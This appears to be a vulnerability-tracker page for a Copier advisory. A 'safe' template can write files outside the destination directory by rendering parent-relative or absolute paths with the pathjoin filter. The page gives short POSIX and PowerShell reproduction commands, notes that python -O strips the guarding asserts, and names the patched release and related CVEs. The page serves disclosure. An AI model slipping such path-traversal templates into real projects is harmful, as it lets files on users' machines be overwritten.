CVE-2025-55214Medium▾ SunlitCopier's safe template has filesystem write access outside destination path
▾ Sunlit zone — Low / medium · no exploitation signal
impact 27.5 · likelihood 0.1 · exploitation 0
Need a working PoC? Pro members can cast a request and our team develops one — it lands right here.
Exploit-prediction probability, daily snapshots since Jul 8.
Disclosure to exploitation, from the record and what we observed since indexing it.
Disclosed via OSV
Last analysed / modified upstream
0.2%
0.2% → 0.3%
Copier suggests that it's safe to generate a project from a safe template, i.e. one that doesn't use unsafe features like custom Jinja extensions which would require passing the --UNSAFE,--trust flag. As it turns out, a safe template can currently write files outside the destination path where a project shall be generated or updated. This is possible when rendering a generated directory structure whose rendered path is either a relative parent path or an absolute path. Constructing such paths is possible using Copier's builtin pathjoin Jinja filter and its builtin _copier_conf.sep variable, which is the platform-native path separator. This way, a malicious template author can create a template that overwrites arbitrary files (according to the user's write permissions), e.g., to cause havoc.
Reproducible example:
echo "foo" > forbidden.txt
mkdir src/
echo "bar" > "src/{{ pathjoin('..', 'forbidden.txt') }}"
uvx copier copy src/ dst/
cat forbidden.txt
Reproducible example:
POSIX:
# Assumption: The current working directory is `/tmp/test-copier-vulnerability/`
echo "foo" > forbidden.txt
mkdir src/
echo "bar" > "src/{{ pathjoin(_copier_conf.sep, 'tmp', 'test-copier-vulnerability', 'forbidden.txt') }}"
uvx --from copier python -O -m copier copy --overwrite src/ dst/
cat forbidden.txt
Windows (PowerShell):
# Assumption: The current working directory is `C:\Users\<user>\Temp\test-copier-vulnerability`
echo "foo" > forbidden.txt
mkdir src
Set-Content -Path src\copier.yml @'
drive:
type: str
default: "C:"
when: false
'@
echo "bar" > "src\{{ pathjoin(drive, 'Users', '<user>', 'Temp', 'test-copier-vulnerability', 'forbidden.txt') }}"
uvx --from copier python -O -m copier copy --overwrite src dst
cat forbidden.txt
This scenario is slightly less severe, as Copier has a few assertions of the destination path being relative which would typically be raised. But python -O (or PYTHONOPTIMIZE=x) removes asserts, so these guards may be ineffective. In addition, this scenario will prompt for overwrite confirmation or require the --overwrite flag for non-interactive mode; yet malicious file writes might go unnoticed.
copier >= 7.1.0, < 9.9.1Upgrade to a patched release:
copier 9.9.1Connected by shared product, vendor, weakness, or advisory.
CVE-2026-53951HighCopier has a trust-prefix bypass via path traversal that runs tasks unprompted
CVE-2026-34730Medium· 5.5Copier `_external_data` allows path traversal and absolute-path local file read without unsafe mode
CVE-2026-34726Medium· 4.4Copier `_subdirectory` allows template root escape via parent-directory traversal
CVE-2026-23968Medium· 5.5Copier safe template has arbitrary filesystem read access via symlinks when _preserve_symlinks: false
CVE-2026-23986High· 7.1Copier safe template has arbitrary filesystem write access via directory symlinks when _preserve_symlinks: true
CVE-2025-55201HighCopier's safe template has arbitrary filesystem read/write access